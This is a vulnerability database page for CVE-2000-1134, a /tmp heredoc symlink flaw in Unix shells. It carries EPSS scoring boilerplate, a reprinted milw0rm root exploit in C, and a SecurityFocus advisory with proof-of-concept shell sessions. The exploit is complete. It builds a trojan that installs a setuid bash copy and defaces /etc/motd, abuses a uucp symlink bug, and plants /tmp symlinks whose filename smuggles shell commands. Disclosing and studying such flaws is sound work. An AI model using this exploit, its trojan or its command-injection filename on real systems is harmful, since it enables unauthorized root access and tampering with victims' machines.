CVE-2000-1134 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/************************************************************** root exploit: multiple subsystem errors allowing root exploit bashack.c - Thu Nov 30 21:50:50 NZDT 2000 (redhat 6.1) /etc/rc.d/ and scripts that are trusting the untrustworthy. /bin/sh acts silly when u get it to use the << redirection. it creates a mode 666 file with an easily predictable name, containing the pid as the only variant. As the same sequence of events happens at most start ups, the pid of the line in /etc/rc.d/rc.sysinit that creates the /boot/kernel.h file which uses << can be exploited. With another bit of bad it will take until the next run of cron.weekly till you have root. I'm sure someone can come up with a faster way. (hint: lotsa stuff run as root have /sbin and /usr/sbin in their paths. / is a pain when backticking, making it hard to tell the program what to run... FNAME below is a method of getting around that, but its ugly as sin ;]) [root@continuity /root]# rpm -qf /usr/bin/uucp uucp-1.06.1-20 [root@continuity /root]# rpm -qf /etc/rc.d/rc3.d chkconfig-1.0.7-2 initscripts-4.48-1 [root@continuity /root]# rpm -qf /bin/bash bash-1.14.7-16 [root@continuity /root]# rpm -qf /etc/cron.weekly/makewhatis.cron man-1.5g-6 The big bug is like the tcsh one someone mentioned a while ago. *****************************************************************/ #include <stdlib.h> #include <stdio.h> #define FNAME "/usr/man/man1/last.1.gz;export PATH=.;cd ..;cd ..;cd ..;cd ..;cd usr;cd sbin;uuconv;.1.gz" main() { int d; char fn[2000]; char *homedir; FILE *file; printf("bashack - root using multiple config/input validation errors\n\n"); printf("creating trojan in /usr/sbin/uuconv\n"); printf(" - uucp bug -\n"); printf("uucp follows symlinks as euid=uucp, (uid,gid,egid=you)\n\n"); homedir=getenv("HOME"); sprintf(fn,"%s/bashacker/",homedir); mkdir(fn); chdir(fn); sprintf(fn,"%s/bashacker/bashaker",homedir); unlink(fn); printf("== uuconv replacement\n"); printf("* making uuconv.c\n"); sprintf(fn,"%s/bashacker/uuconv.c",homedir); file=fopen(fn,"w"); sprintf(fn,"%s/bashacker",homedir); fprintf(file,"main()\n{\n"); fprintf(file,"printf(\"sendmail\n\");\n"); fprintf(file,"system(\"/bin/cp /bin/bash %s/bashacker;",fn); fprintf(file,"/bin/chmod 6711 %s/bashacker;",fn); fprintf(file,"echo hacked by %s>>/etc/motd;",getenv("LOGNAME")); fprintf(file,"echo -n \\\"at about \\\" >>/etc/motd; /bin/date >>/etc/motd"); fprintf(file,"\");\n"); fprintf(file,"}\n"); fclose(file); printf("* compiling ./uuconv.c ==> ./uuconv \n"); system("cc -o uuconv uuconv.c -O2;strip uuconv"); unlink("/var/spool/uucppublic/uuconv"); symlink("/usr/sbin/uuconv","/var/spool/uucppublic/uuconv"); printf("* copying to /usr/sbin via uucp bug\n"); sprintf(fn, "/usr/bin/uucp %s/bashacker/uuconv /var/spool/uucppublic/uuconv",homedir); system(fn); printf("== cleaning up a little.\n"); unlink("/var/spool/uucppublic/uuconv"); unlink("uuconv"); unlink("uuconv.c"); printf("== set up /tmp for bash part of exploit.\n"); for(d=100;d<150;d++) /* on my machine its something like 118-120 or something, but it does depend on what was running, or what files existed and stuff. so please excuse the shotgun approach. */ { sprintf(fn,"/tmp/t%d-sh",d); unlink(fn); symlink(FNAME,fn); } printf("* my work here is done.\n\n"); printf("now pray for some kinda of crash.\n\n\t--zen\n"); } // milw0rm.com [2000-12-04]

source: https://www.securityfocus.com/bid/2006/info bash, tcsh, cash, ksh and sh are all variations of the Unix shell distributed with many Unix and Unix clone operating systems. A vulnerability exists in these shells that could allow an attacker to arbitrarily write to files. A vulnerability has been discovered in a number of Unix shells which may allow a local attacker to corrupt files or potentially elevate privileges. Scripts and command line operations using << as a redirection operator create files in the /tmp directory with a predictable naming convention. Additionally, files are created in the /tmp directory without first checking if the file already exists. This could result in a symbolic link attack that could be used to corrupt any file that the owner of the redirecting shell has access to write to. This issue affects those systems running vulnerable versions of bash, tcsh, cash, ksh and sh. ksh is reportedly not vulnerable for IBM AIX systems. #!/bin/ksh -x touch /tmp/silly.1 ln -s /tmp/silly.1 /tmp/sh$$.1 ls -l /tmp/silly.* /tmp/sh$$.* cat <<EOF Just some short text EOF ls -l /tmp/silly.* /tmp/sh$$.* rm /tmp/silly.* /tmp/sh$$.* This example was submitted by proton <[email protected]> in an October 29th, 2001 BugTraq posting: /tmp# echo 'hello world' > rootfile /tmp# chmod 600 rootfile /tmp# ln -s rootfile sh$$ /tmp# chown -h 666.666 sh$$ /tmp# ls -l rootfile sh$$ -rw------- 1 root root 12 Oct 29 03:55 rootfile lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 -> rootfile /tmp# cat <<BAR ? FOO ? BAR FOO o world /tmp# ls -l rootfile sh$$ /bin/ls: sh12660: No such file or directory -rw------- 1 root root 12 Oct 29 03:56 rootfile /tmp# cat rootfile FOO o world /tmp#